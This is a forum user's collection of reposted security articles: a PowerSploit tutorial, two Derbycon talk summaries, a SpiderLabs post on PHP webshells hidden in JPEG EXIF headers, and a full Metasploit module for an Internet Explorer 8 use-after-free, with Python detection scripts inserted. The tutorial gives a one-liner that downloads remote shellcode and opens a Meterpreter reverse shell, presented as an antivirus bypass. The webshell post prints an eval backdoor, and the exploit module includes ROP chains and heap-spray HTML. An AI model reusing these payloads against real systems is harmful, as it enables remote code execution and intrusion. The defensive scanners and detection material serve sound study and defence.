Everything posted by Nytro

  1. PowerSploit: The Easiest Shell You'll Ever Get

     2013/09/18 | Posted in Penetration Testing

     Sometimes you just want a shell. You don't want to worry about compiling a binary, testing it against antivirus, figuring out how to upload it to the box and finally execute it. Maybe you are giving a demo of an awesome new Meterpreter post-exploitation module. Maybe you have less than a minute of physical access to a Windows kiosk machine and need a quick win. There are plenty of scenarios that end in a penetration tester gaining GUI access to a target machine through guessed or found RDP, ESX or VNC credentials. In those situations, the easiest way to get a Meterpreter shell without worrying about AV is with PowerSploit.

     PowerSploit is a collection of security-related modules and functions written in PowerShell. PowerSploit is already in both BackTrack and Kali, and its code is utilized by other awesome tools like SET, so you may already be using it! Many of the scripts in the project are extremely useful in post-exploitation in Windows environments. The project was started by Matt Graeber, who is the author of the function we will use in this tutorial: Invoke-Shellcode.

     In order for this to work, the target machine must have PowerShell installed and internet access. The first step is for us to set up our handler on our attacker box. This is something we will likely do often, so let's automate it with a really simple Python script:

     To start the multi/handler and configure it, we just run the script:

     [code]python StartListener.py 192.168.0.15 443[/code]

     Now that our handler is ready, we can move on to executing our shell. The first thing I did to make the next step easier to type is shorten the GitHub link to Invoke-Shellcode with bitly:

     Next, we need to run two commands in a PowerShell prompt to get our Meterpreter shell. The first command will create a .Net WebClient object to download the function and pass it to Invoke-Expression to put it into memory:

     [code]IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c')[/code]

     Now we just need to make a call to the Invoke-Shellcode function with the relevant parameters from the listener:

     [code]Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.0.15 -Lport 443 -Force[/code]

     We can actually combine these commands to run a single command to execute our shell:

     [code]IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.0.1.200 -Lport 443 -Force[/code]

     Once we get the prompt back, we can safely close PowerShell because the ultra-useful Smart_Migrate Meterpreter script has safely landed us in a new process:

     That is the easiest and most convenient AV-bypass I have ever seen! Just open PowerShell and type a command. Hopefully this post has shown you one way PowerSploit can make your life as a pen-tester easier. You can find more ways at my blog and by following me on twitter. Also, join me at Derbycon, where I will talk about the Pass-the-Hash attack and some simple mitigations with Skip Duckwall, and about how to use PowerSploit and Windows tools to accomplish post-exploitation tasks without uploading binaries with Matt Graeber. I hope to see you all there!

     -Chris

     Source: Pentest Geek
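One way a defender can spot the download cradle and the Invoke-Shellcode call shown above in PowerShell script block logs, as an added Python example (not code from the post or from PowerSploit; the log blocks are constructed and example.invalid is a placeholder host):

```python
"""Flag the PowerShell download cradle from the post in script block log text.

Added example, not code from the original post or from PowerSploit: it scans
constructed script block text (the kind PowerShell script block logging
records as Event ID 4104) for the IEX + Net.WebClient.DownloadString cradle
and the Invoke-Shellcode call, and extracts the download URL and the
LHOST/LPORT so a responder knows what to block.
"""
import re

# Each indicator on its own; matching is case-insensitive because PowerShell is.
INDICATORS = {
    "webclient_download": re.compile(r"Net\.WebClient\b.*?\.DownloadString\(", re.I | re.S),
    "invoke_expression": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    "invoke_shellcode": re.compile(r"\bInvoke-Shellcode\b", re.I),
}
# Parameter extraction; the dash class also accepts the en dash copy/paste often produces.
URL_RE = re.compile(r"""DownloadString\(\s*['"]([^'"]+)['"]""", re.I)
PARAM_RES = {
    "payload": re.compile(r"[-\u2013]Payload\s+(\S+)", re.I),
    "lhost": re.compile(r"[-\u2013]Lhost\s+(\S+)", re.I),
    "lport": re.compile(r"[-\u2013]Lport\s+(\d+)", re.I),
}


def analyze_script_block(text):
    """Return None for a clean block, else a dict with indicators and extracted IoCs."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    # A download cradle needs both halves; Invoke-Shellcode alone is also worth a look.
    cradle = "webclient_download" in hits and "invoke_expression" in hits
    if not cradle and "invoke_shellcode" not in hits:
        return None
    finding = {"indicators": hits, "download_cradle": cradle}
    m = URL_RE.search(text)
    if m:
        finding["download_url"] = m.group(1)
    for key, rx in PARAM_RES.items():
        m = rx.search(text)
        if m:
            finding[key] = m.group(1)
    return finding


# Constructed sample script blocks.
SAMPLE_BLOCKS = [
    # The one-liner from the post.
    "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); "
    "Invoke-Shellcode -Payload windows/meterpreter/reverse_https "
    "-Lhost 192.168.0.15 -Lport 443 -Force",
    # Same cradle split over two lines with a variable, as a script would be logged.
    "$wc = New-Object System.Net.WebClient\n"
    "invoke-expression ($wc.DownloadString(\"http://example.invalid/stage.ps1\"))",
    # Benign download with no evaluation: must not fire.
    "(New-Object Net.WebClient).DownloadString('http://example.invalid/notes.txt') | Out-File n.txt",
    # Ordinary admin command: must not fire.
    "Get-ChildItem C:\\Windows\\Temp | Where-Object Length -gt 1MB",
]


def scan_blocks(blocks=SAMPLE_BLOCKS):
    """Return [(index, finding)] for the blocks that trip the detector."""
    results = []
    for i, block in enumerate(blocks):
        finding = analyze_script_block(block)
        if finding:
            results.append((i, finding))
    return results


if __name__ == "__main__":
    for idx, finding in scan_blocks():
        print(f"block {idx}: {finding}")
```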
  2. Derbycon 2013 - An Encyclpwnia Of Persistence - Skip Duckwall, Will Peteroy

     Description: While I was working on a Linux boot CD for Red Team operations, I started researching various persistence techniques that were out there in "the real world". Pretty soon a couple of pages of notes became a notebook full of information. Based on public information from incident reports, AV vendors, blogs, and con talks, I started trying to categorize the various techniques to make them easier to digest. One thing that immediately jumped out was that nobody had apparently tried to do this before. With help from another former Red Teamer, Will, we were able to categorize over 20 different ways that somebody could attain persistence. Our hope is that our talk will benefit both the folks who have to defend and those who provide threat emulation by providing details about real world persistence methods.

     Bio: "Skip: Spoke at BHUSA 2012, Defcon 19, Derbycon. Former Red Teamer. Bunch of certs... working for Accuvant Labs. Will: Spoke at Bsides a couple of places (PDX, SEA). Former Red Teamer. Certs and degrees and shit. Currently doing penance for RT work at Microsoft Security Response Center"

     For more information please visit: DerbyCon : Louisville, Kentucky; Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos)

     Source: Derbycon 2013 - An Encyclpwnia Of Persistence - Skip Duckwall, Will Peteroy
  3. Derbycon 2013 - Antivirus Evasion: Lessons Learned - Thelightcosine

     Description: Over the past year, the speaker has spent a lot of time talking with people in the infoSec community and doing research on antivirus evasion techniques, learning what works and what doesn't. There are a lot of good ideas floating around out there. In this talk we're going to pull those ideas all together. We'll discuss the basics of the AV evasion problem, what techniques work, which ones don't and why. The talk will have a particular focus on AV evasion as it relates to Metasploit payloads.

     Bio: David "thelightcosine" Maloney is a Senior Software Engineer on the Metasploit team at Rapid7. Before that he was a Penetration Tester for some large corporations, specializing in Web Applications, and was a longtime contributor to the Metasploit Framework. He is a member of the Corelan Security Team, and sort of an auxiliary member of the FALE locksport group. He is one of the founders of Hackerspace Charlotte in NC.

     For more information please visit: DerbyCon : Louisville, Kentucky; Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos)

     Source: Derbycon 2013 - Antivirus Evasion: Lessons Learned - Thelightcosine
  4. [h=3]Hiding Webshell Backdoor Code in Image Files[/h]

     First appearances may be deceiving...

     Web attackers have been using a method of stashing pieces of their PHP backdoor exploit code within the meta-data headers of image files to evade detection. This is not a completely new tactic; however, it is not as well known by the defensive community, so we want to raise awareness. Let's first take a quick look at why this technique is being utilized by attackers.

     [h=1]Standard Webshell Backdoor Code[/h]

     There are many methods attackers employ to upload Webshell backdoor code onto compromised web servers, including Remote File Inclusion (RFI), the Wordpress TimThumb Plugin and even non-web attack vectors such as stolen FTP credentials. Here is a graphic taken from this year's Trustwave SpiderLabs Global Security Report that lists the top malicious file types uploaded to compromised web servers:

     Let's take a look at a standard obfuscated R57 shell example:

     Notice the Base64 encoded parameter data and then the PHP Eval call at the end. Once PHP executes this code, it will decode and inflate the data stream and the result will be a basic file uploader webshell similar to the following:

     [h=1]Incident Response Steps - Identification and Eradication[/h]

     These types of attacks and compromises are so prevalent in Shared Hosting environments where end users do not properly update their web application software. In response to these types of scenarios, Hosting Provider security teams often employ OS-level back-end processes that scan the local file systems looking for tell-tale signs of webshell backdoor code. One example tool is called MalDetect. This script can be run to analyze files and detect various forms of malicious code. If we run maldetect against our example R57 webshell file we get the following:

     [code]
     $ sudo /usr/local/maldetect/maldet --config-option quar_hits=0,quar_clean=0,clamav_scan=1 -a "/tmp/lin.php"
     Linux Malware Detect v1.4.2
                 (C) 2002-2013, R-fx Networks <proj@r-fx.org>
                 (C) 2013, Ryan MacDonald <ryan@r-fx.org>
     inotifywait (C) 2007, Rohan McGovern <rohan@mcgovern.id.au>
     This program may be freely redistributed under the terms of the GNU GPL v2

     maldet(92294): {scan} signatures loaded: 9011 (7145 MD5 / 1866 HEX)
     maldet(92294): {scan} building file list for /tmp/lin.php, this might take awhile...
     maldet(92294): {scan} file list completed, found 1 files...
     maldet(92294): {scan} 1/1 files scanned: 0 hits 0 cleaned
     maldet(92294): {scan} scan completed on /tmp/lin.php: files 1, malware hits 1, cleaned hits 0
     maldet(92294): {scan} scan report saved, to view run: maldet --report 101113-1250.92294
     maldet(92294): {scan} quarantine is disabled! set quar_hits=1 in conf.maldet or to quarantine results run: maldet -q 101113-1250.92294

     $ sudo maldet --report 101113-1250.92294
     malware detect scan report for MacBook-Pro-2.local:
     SCAN ID: 101113-1250.92294
     TIME: Oct 11 12:50:48 -0400
     PATH: /tmp/lin.php
     TOTAL FILES: 1
     TOTAL HITS: 1
     TOTAL CLEANED: 0

     NOTE: quarantine is disabled! set quar_hits=1 in conf.maldet or to quarantine results run: maldet -q 101113-1250.92294

     FILE HIT LIST:
     {MD5}base64.inject.unclassed.1 : /tmp/lin.php
     ===============================================
     Linux Malware Detect v1.4.2 < proj@rfxn.com >
     [/code]

     As you can see, maldetect identified this PHP file with one of its generic base64 injection signatures. While this individual file scanning does work, for manageability, most organizations opt to run maldetect as part of an ongoing automated process run through scheduling tools such as Cron. The big problem with this process is that, for performance reasons, many organizations opt to only scan PHP files and exclude other file types from being scanned...

     [h=1]Hiding Webshell Backdoor Code in Image Files[/h]

     This brings us back to the beginning of the blog post. Due to the cleanup tactics used by most organizations, the bad guys had to figure out a method of hiding their backdoor code in places that most likely would not be inspected. In this case, we are talking about hiding PHP code data within the Exif image header fields. The concept of Steganography is not new and there have been many past examples of its use for passing data; however, we are now seeing it used for automated code execution. I do want to give a proper hat-tip to the Sucuri Research Team who also found similar techniques being employed.

     [h=2]PHP Code In EXIF Headers[/h]

     If you were to view-source in a browser or use something like the unix strings command, you could see the new code added to the top of the image files:

     After uploading this file to VirusTotal, you can see a more friendly representation of the EXIF fields:

     As you can see, the PHP code is held within the EXIF "Model" and "Make" fields. This data does not in any way interfere with the proper rendering of the image file itself.

     [h=2]PHP's exif_read_data function[/h]

     PHP has a function called exif_read_data which allows it to read the header data of image files. It is used extensively in many different plugins and tools. Here is an example from Facebook's GitHub Repo:

     [h=2]Updated PHP Webshell Code[/h]

     So, with pieces of their webshell stashed away within the EXIF headers of either local or remote image files, the attackers can then modify their PHP code to leverage the PHP exif_read_data function like this:

     [phpcode]<?php
     $exif = exif_read_data('http://REDACTED/images/stories/Logo_Coveright.jpg');
     preg_replace($exif['Make'],$exif['Model'],'');
     ?>[/phpcode]

     The first line downloads a remote jpg image file with the stashed code in it and then sets the $exif variable with the array value. We can modify this PHP code to simulate this by downloading the same file and then dumping the $exif data:

     [phpcode]<?php
     $exif = exif_read_data('http://REDACTED/images/stories/Logo_Coveright.jpg');
     var_dump($exif);
     ?>[/phpcode]

     When executing this php file, we get the following output:

     [code]
     $ php ./exif_dumper.php
     array(9) {
       ["FileName"]=>
       string(18) "Logo_Coveright.jpg"
       ["FileDateTime"]=>
       int(0)
       ["FileSize"]=>
       int(6159)
       ["FileType"]=>
       int(2)
       ["MimeType"]=>
       string(10) "image/jpeg"
       ["SectionsFound"]=>
       string(13) "ANY_TAG, IFD0"
       ["COMPUTED"]=>
       array(5) {
         ["html"]=>
         string(23) "width="155" height="77""
         ["Height"]=>
         int(77)
         ["Width"]=>
         int(155)
         ["IsColor"]=>
         int(1)
         ["ByteOrderMotorola"]=>
         int(0)
       }
       ["Make"]=>
       string(5) "/.*/e"
       ["Model"]=>
       string(108) "eval(base64_decode('aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));"
     }
     [/code]

     The final step in this process is to execute the PHP preg_replace function.

     [phpcode]<?php
     $exif = exif_read_data('http://REDACTED/images/stories/Logo_Coveright.jpg');
     preg_replace($exif['Make'],$exif['Model'],'');
     ?>[/phpcode]

     Notice that the $exif['Make'] variable data uses the "/.*/e" PCRE regex modifier (PREG_REPLACE_EVAL), which will evaluate the data from the $exif['Model'] variable. In this case, it would execute the base64_decode, which results in the following PHP snippet of code:

     [phpcode]if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"]));}[/phpcode]

     This code checks to see if there is a POST request body parameter named "zz1" and, if there is, it will then eval the contents. This makes it quite easy for attackers to sprinkle backdoor access code by injecting other legitimate PHP files with this combination of exif_read_data and preg_replace code.

     [h=1]How Widespread?[/h]

     We cannot accurately estimate how widely this technique is being used; however, there is a small amount of empirical evidence from simply using public search engines to flag any web pages that list characteristics of either EXIF code hiding or this specific base64 encoded string value. There are hundreds of examples of this base64 encoded data being present within image files.

     [h=1]Recommendations[/h]

     [h=2]Scan All Files for Malicious Code[/h]

     If you are running OS level scanning of files on disk, carefully consider which file-types you want to include/exclude. As this scenario shows, attackers can take advantage of your excluded content to hide their code.

     [h=2]Scan Files During Attachment Uploading using ModSecurity[/h]

     When end users are uploading images as file attachments, ModSecurity has the ability to:

     - Extract the file and dump it to a tmp file on disk
     - Execute the @inspectFile operator to analyze the file
     - Block uploading if malware is found

     The maldetect README file even includes instructions on how to integrate it with ModSecurity:

     [code]
     [ MODSECURITY2 UPLOAD SCANNING ]
     The support for HTTP upload scanning is provided through mod_security2's inspectFile hook. This feature allows for a validation script to be used in permitting or denying an upload. The convenience script to facilitate this is called modsec.sh and is located in the /usr/local/maldetect installation path.

     The default setup is to run a standard maldet scan with no clamav support, no cleaner rule executions and quarantining enabled; these options are set in the interest of performance vs accuracy, which is a fair tradeoff. The scan options can be modified in the modsec.sh file if so desired; the default scan options are as follows:
     --config-option quar_hits=1,quar_clean=0,clamav_scan=0 --modsec -a "$file"

     There is a tangible performance difference in disabling clamav scanning in this usage scenario. The native LMD scanner engine is much faster than the clamav scanner engine in single file scans by a wide margin. A single file scan using clamav takes roughly 3sec on average while the LMD scanner engine takes 0.5sec or less.

     To enable upload scanning with mod_security2 you must enable the public_scan option in conf.maldet (public_scan=1) then add the following rules to your mod_security2 configuration. These rules are best placed in your modsec2.user.conf file on cpanel servers or at the top of the appropriate rules file for your setup.

     /usr/local/apache/conf/modsec2.user.conf (or similar mod_security2 rules file):
     SecRequestBodyAccess On
     SecRule FILES_TMPNAMES "@inspectFile /usr/local/maldetect/modsec.sh" \
         "log,auditlog,deny,severity:2,phase:2,t:none"

     A restart of the HTTPd service is required following these changes.

     When an upload takes place that is determined to be malware, it will be rejected and an entry will appear in the mod_security2 SecAuditLog file. On cpanel servers and most configurations this is the modsec_audit.log located under /usr/local/apache/logs or /var/log/httpd. The log entry will appear similar to the following:
     Message: Access denied with code 406 (phase 2). File "/tmp/20111120-....-file" rejected by the approver script "/usr/local/maldetect/modsec.sh": 0 maldet: {HEX}php.cmdshell.r57.317 /tmp/20111120-....-file [file "/usr/local/apache/conf/modsec2.user.conf"] [line "3"] [severity "CRITICAL"]
     [/code]

     Source: Hiding Webshell Backdoor Code in Image Files - SpiderLabs
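An added Python example, not code from the SpiderLabs post or from maldetect, of the check a file scanner needs once image files are no longer excluded: a stdlib-only parser that reads the EXIF Make/Model fields from a JPEG and flags the "/.*/e" pattern and the eval() payload the post shows. The sample JPEG, its EXIF segment and its payload are all constructed inside the block.

```python
"""Scan JPEG EXIF Make/Model fields for the stashed PHP payload the post describes.

Added example, not code from the SpiderLabs post or from maldetect: a
stdlib-only parser for the JPEG APP1/Exif segment that reads the IFD0 ASCII
tags Make (0x010F) and Model (0x0110) and flags values that look like PHP
code or a PCRE pattern carrying the /e (eval) modifier, i.e. the two halves
of the exif_read_data + preg_replace backdoor.  The sample JPEG is built in
code (build_jpeg) so the block runs offline; its payload is constructed.
"""
import re
import struct

TAG_NAMES = {0x010F: "Make", 0x0110: "Model"}
TYPE_ASCII = 2

SUSPICIOUS = [
    re.compile(r"<\?php|<\?=", re.I),
    re.compile(r"\b(?:eval|assert|base64_decode|gzinflate|str_rot13|system|passthru|shell_exec)\s*\(", re.I),
    re.compile(r"^/.*/[a-zA-Z]*e[a-zA-Z]*$"),      # PCRE pattern with the /e modifier, like "/.*/e"
    re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b"),
]


def _parse_ifd0_ascii(tiff):
    """Return {"Make": ..., "Model": ...} from the TIFF block inside an Exif segment."""
    end = {b"II": "<", b"MM": ">"}.get(tiff[:2])
    if end is None or struct.unpack(end + "H", tiff[2:4])[0] != 42:
        raise ValueError("bad TIFF header")
    ifd0 = struct.unpack(end + "I", tiff[4:8])[0]
    count = struct.unpack(end + "H", tiff[ifd0:ifd0 + 2])[0]
    tags = {}
    for i in range(count):
        entry = ifd0 + 2 + 12 * i
        tag, typ, n, val = struct.unpack(end + "HHI4s", tiff[entry:entry + 12])
        if tag not in TAG_NAMES or typ != TYPE_ASCII:
            continue
        if n <= 4:                       # short values are stored inline in the entry
            raw = val[:n]
        else:                            # longer values live at an offset from the TIFF start
            off = struct.unpack(end + "I", val)[0]
            raw = tiff[off:off + n]
        tags[TAG_NAMES[tag]] = raw.rstrip(b"\x00").decode("latin-1")
    return tags


def exif_make_model(data):
    """Walk the JPEG marker segments and parse the first Exif APP1 segment found."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG")
    pos = 2
    while pos + 4 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):       # EOI or SOS: no more header segments
            break
        seglen = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        body = data[pos + 4:pos + 2 + seglen]
        if marker == 0xE1 and body.startswith(b"Exif\x00\x00"):
            return _parse_ifd0_ascii(body[6:])
        pos += 2 + seglen
    return {}


def scan_image(data):
    """Return [(field, value, matched_pattern)] for Make/Model values that look like code."""
    hits = []
    for field, value in exif_make_model(data).items():
        for rx in SUSPICIOUS:
            if rx.search(value):
                hits.append((field, value, rx.pattern))
                break
    return hits


def build_jpeg(make, model):
    """Constructed minimal JPEG: SOI, one APP1/Exif segment with IFD0 {Make, Model}, EOI."""
    entries, blob = b"", b""
    data_start = 8 + 2 + 12 * 2 + 4        # TIFF header, entry count, 2 entries, next-IFD pointer
    for tag, text in ((0x010F, make), (0x0110, model)):
        raw = text.encode("latin-1") + b"\x00"
        if len(raw) <= 4:
            entries += struct.pack("<HHI4s", tag, TYPE_ASCII, len(raw), raw.ljust(4, b"\x00"))
        else:
            entries += struct.pack("<HHII", tag, TYPE_ASCII, len(raw), data_start + len(blob))
            blob += raw
    tiff = b"II*\x00" + struct.pack("<IH", 8, 2) + entries + b"\x00" * 4 + blob
    app1 = b"Exif\x00\x00" + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"


# Constructed payload mirroring the post: Make carries the /e pattern, Model the eval().
EVIL_JPEG = build_jpeg("/.*/e", "eval(base64_decode('ZWNobyAxOw=='));")
CLEAN_JPEG = build_jpeg("HP", "PhotoSmart")

if __name__ == "__main__":
    for name, img in (("evil", EVIL_JPEG), ("clean", CLEAN_JPEG)):
        print(name, scan_image(img))
```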
  5. MS13-080 (CVE-2013-3897): Internet Explorer CDisplayPointer Use-After-Free

     Added by sinn3r, about 15 hours ago

     Add MS13-080 (CVE-2013-3897): Internet Explorer CDisplayPointer Use-After-Free

     This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP, around the same time frame as CVE-2013-3893, except this was kept out of the public eye by multiple research companies and the vendor until the October patch release. This issue is a use-after-free vulnerability in CDisplayPointer via the use of a "onpropertychange" event handler. To set up the appropriate buggy conditions, we first craft the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element. If we use a select() function for the CTextArea element, two important things will happen: a CDisplayPointer object will be created for CTextArea, and it will also trigger another event called "onselect". The "onselect" event will allow us to set up for the actual event handler we want to abuse - the "onpropertychange" event. Since the CBlockElement is a child of CTextArea, if we do a node swap of CBlockElement in "onselect", this will trigger "onpropertychange". During "onpropertychange" event handling, a free of the CDisplayPointer object can be forced by using an "Unselect" (other approaches also apply), but a reference to this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after the CDoc::GetLineInfo call, because it is still trying to use that to update CDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash finally occurs due to accessing the freed memory. By controlling this freed memory, it is possible to achieve arbitrary code execution under the context of the user.

     [code]
     ##
     # This file is part of the Metasploit Framework and may be subject to
     # redistribution and commercial restrictions. Please see the Metasploit
     # Framework web site for more information on licensing and terms of use.
     # http://metasploit.com/framework/
     ##

     require 'msf/core'

     class Metasploit3 < Msf::Exploit::Remote
       Rank = NormalRanking

       include Msf::Exploit::Remote::HttpServer::HTML
       include Msf::Exploit::RopDb
       include Msf::Exploit::Remote::BrowserAutopwn

       autopwn_info({
         :ua_name    => HttpClients::IE,
         :ua_minver  => "8.0",
         :ua_maxver  => "8.0",
         :javascript => true,
         :os_name    => OperatingSystems::WINDOWS,
         :rank       => NormalRanking
       })

       def initialize(info={})
         super(update_info(info,
           'Name'           => "MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free",
           'Description'    => %q{
             This module exploits a vulnerability found in Microsoft Internet Explorer. It was
             originally found being exploited in the wild targeting Japanese and Korean IE8 users on
             Windows XP, around the same time frame as CVE-2013-3893, except this was kept out of the
             public eye by multiple research companies and the vendor until the October patch release.
             This issue is a use-after-free vulnerability in CDisplayPointer via the use of a
             "onpropertychange" event handler. To set up the appropriate buggy conditions, we first
             craft the DOM tree in a specific order, where a CBlockElement comes after the CTextArea
             element. If we use a select() function for the CTextArea element, two important things
             will happen: a CDisplayPointer object will be created for CTextArea, and it will also
             trigger another event called "onselect". The "onselect" event will allow us to set up
             for the actual event handler we want to abuse - the "onpropertychange" event. Since the
             CBlockElement is a child of CTextArea, if we do a node swap of CBlockElement in
             "onselect", this will trigger "onpropertychange". During "onpropertychange" event
             handling, a free of the CDisplayPointer object can be forced by using an "Unselect"
             (other approaches also apply), but a reference to this freed memory will still be kept
             by CDoc::ScrollPointerIntoView, specifically after the CDoc::GetLineInfo call, because
             it is still trying to use that to update CDisplayPointer's position. When this invalid
             reference arrives in QIClassID, a crash finally occurs due to accessing the freed
             memory. By controlling this freed memory, it is possible to achieve arbitrary code
             execution under the context of the user.
           },
           'License'        => MSF_LICENSE,
           'Author'         =>
             [
               'Unknown', # Exploit in the wild
               'sinn3r'   # Metasploit
             ],
           'References'     =>
             [
               [ 'CVE', '2013-3897' ],
               [ 'OSVDB', '98207' ],
               [ 'MSB', 'MS13-080' ],
               [ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/10/08/ms13-080-addresses-two-vulnerabilities-under-limited-targeted-attacks.aspx' ],
               [ 'URL', 'http://jsunpack.jeek.org/?report=847afb154a4e876d61f93404842d9a1b93a774fb' ]
             ],
           'Platform'       => 'win',
           'Targets'        =>
             [
               [ 'Automatic', {} ],
               [ 'IE 8 on Windows XP SP3', {} ],
               [ 'IE 8 on Windows 7', {} ]
             ],
           'Payload'        =>
             {
               'BadChars'       => "\x00",
               'PrependEncoder' => "\x81\xc4\x0c\xfe\xff\xff" # add esp, -500
             },
           'DefaultOptions' =>
             {
               'InitialAutoRunScript' => 'migrate -f'
             },
           'Privileged'     => false,
           # Jsunpack first received a sample to analyze on Sep 12 2013.
           # MSFT patched this on Oct 8th.
           'DisclosureDate' => "Oct 08 2013",
           'DefaultTarget'  => 0))
       end

       def get_check_html
         %Q|<html>
         <script>
         #{js_os_detect}
         function os() {
           var detect = window.os_detect.getVersion();
           var os_string = detect.os_name + " " + detect.os_flavor + " " + detect.ua_name + " " + detect.ua_version;
           return os_string;
         }
         function dll() {
           var checka = 0;
           var checkb = 0;
           try { checka = new ActiveXObject("SharePoint.OpenDocuments.4"); } catch (e) {}
           try { checkb = new ActiveXObject("SharePoint.OpenDocuments.3"); } catch (e) {}
           if ((typeof checka) == "object" && (typeof checkb) == "object") {
             try{location.href='ms-help://'} catch(e){}
             return "office2010";
           } else if ((typeof checka) == "number" && (typeof checkb) == "object") {
             try{location.href='ms-help://'} catch(e){}
             return "office2007";
           }
           return "default";
         }
         window.onload = function() {
           window.location = "#{get_resource}/search?o=" + os() + "&d=" + dll();
         }
         </script>
         </html>
         |
       end

       def junk
         rand_text_alpha(4).unpack("V")[0].to_i
       end

       def get_payload(target_info)
         rop_payload = ''

         case target_info[:dll]
         when 'office2007'
           pivot = [
             0x51c2213f, # xchg eax,esp # popad # add byte ptr [eax],al # retn 4
             junk,       # ESI due to POPAD
             junk,       # EBP due to POPAD
             junk,
             junk,       # EBX due to POPAD
             junk,       # EDX due to POPAD
             junk,       # ECX due to POPAD
             0x51c5d0a7, # EAX due to POPAD (must be writable for the add instruction)
             0x51bd81db, # ROP NOP
             junk        # Padding for the retn 4 from the stack pivot
           ].pack("V*")
           rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2007', 'pivot'=>pivot})

         when 'office2010'
           pivot = [
             0x51c00e64, # xchg eax, esp; add eax, [eax]; add esp, 10; mov eax,esi; pop esi; pop ebp; retn 4
             junk, junk, junk, junk, junk,
             0x51BE7E9A, # ROP NOP
             junk        # Padding for the retn 4 from the stack pivot
           ].pack("V*")
           rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>pivot})

         when 'default'
           if target_info[:os] =~ /windows xp/i
             # XP uses msvcrt.dll
             pivot = [
               0x77C3868A # xchg eax,esp; rcr [ebx-75], 0c1h; pop ebp; ret
             ].pack("V*")
             rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp', 'pivot'=>pivot})
           else
             # Assuming this is Win 7, and we'll use Java 6 ROP
             pivot = [
               0x7c342643, # xchg eax,esp # pop edi # add byte ptr [eax],al # pop ecx # retn
               junk        # Padding for the POP ECX
             ].pack("V*")
             rop_payload = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})
           end
         end

         rop_payload
       end

       def get_sploit_html(cli, target_info)
         os  = target_info[:os]
         dll = target_info[:dll]

         js_payload = ''
         if os =~ /Windows (7|XP) MSIE 8\.0/
           print_status("Target uses #{os} with #{dll} DLL... engaging.")
           js_payload = Rex::Text.to_unescape(get_payload(target_info))
         else
           print_error("Target uses #{os} with #{dll} DLL... not supported by this attack.")
           return ""
         end

         %Q|<html>
         <head>
         <script>
         #{js_property_spray}
         sprayHeap({shellcode:unescape("#{js_payload}")});
         var earth = document;
         var data = "";
         for (i=0; i<17; i++) {
           if (i==7) {
             data += unescape("%u2020%u2030");
           } else {
             data += "\\u4141\\u4141";
           }
         }
         data += "\\u4141";
         function butterfly() {
           for(i=0; i<20; i++) {
             var effect = earth.createElement("div");
             effect.className = data;
           }
         }
         function kaiju() {
           var godzilla = earth.createElement("textarea");
           var minilla = earth.createElement("pre");
           earth.body.appendChild(godzilla);
           earth.body.appendChild(minilla);
           godzilla.appendChild(minilla);
           godzilla.onselect=function(e) {
             minilla.swapNode(earth.createElement("div"));
           }
           var battleStation = false;
           var war = new Array();
           godzilla.onpropertychange=function(e) {
             if (battleStation == true) {
               for (i=0; i<50; i++) {
                 war.push(earth.createElement("span"));
               }
             }
             earth.execCommand("Unselect");
             if (battleStation == true) {
               for (i=0; i < war.length; i++) {
                 war[i].className = data;
               }
             } else {
               battleStation = true;
             }
           }
           butterfly();
           godzilla.select();
         }
         </script>
         </head>
         <body onload='kaiju()'>
         </body>
         </html>
         |
       end

       def on_request_uri(cli, request)
         if request.uri =~ /search\?o=(.+)\&d=(.+)$/
           target_info = {
             :os  => Rex::Text.uri_decode($1),
             :dll => Rex::Text.uri_decode($2)
           }
           sploit = get_sploit_html(cli, target_info)
           send_response(cli, sploit, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
           return
         end

         html = get_check_html
         print_status("Checking out target...")
         send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
       end

     end

     =begin

     +hpa this for debugging or you might not see a crash at all

     0:005> r
     eax=d6091326 ebx=0777efd4 ecx=00000578 edx=000000c8 esi=043bbfd0 edi=043bbf9c
     eip=6d6dc123 esp=043bbf7c ebp=043bbfa0 iopl=0         nv up ei pl zr na pe nc
     cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
     mshtml!QIClassID+0x30:
     6d6dc123 8b03            mov     eax,dword ptr [ebx]  ds:0023:0777efd4=????????

     0:005> u
     mshtml!QIClassID+0x30:
     6d6dc123 8b03            mov     eax,dword ptr [ebx]
     6d6dc125 8365e800        and     dword ptr [ebp-18h],0
     6d6dc129 8d4de8          lea     ecx,[ebp-18h]
     6d6dc12c 51              push    ecx
     6d6dc12d 6870c16d6d      push    offset mshtml!IID_IProxyManager (6d6dc170)
     6d6dc132 53              push    ebx
     6d6dc133 bf02400080      mov     edi,80004002h
     6d6dc138 ff10            call    dword ptr [eax]

     =end
     [/code]

